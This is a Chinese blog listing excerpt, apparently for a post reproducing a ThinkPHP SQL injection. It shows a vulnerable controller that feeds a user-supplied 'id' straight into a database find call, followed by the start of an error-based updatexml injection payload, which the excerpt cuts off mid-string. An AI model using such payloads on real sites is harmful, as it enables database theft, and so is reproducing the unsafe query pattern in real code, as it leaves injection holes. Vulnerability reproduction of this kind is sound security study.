摘要: 控制器代码: public function index(){ $id=I('id'); $res=M('users')->find($id); dump($res); } 复现: payload: id[table]=users where 1 and updatexml(1,concat(0x7 阅读全文
posted @ 2021-07-22 17:47 1jzz 阅读(187) 评论(0) 推荐(0) 编辑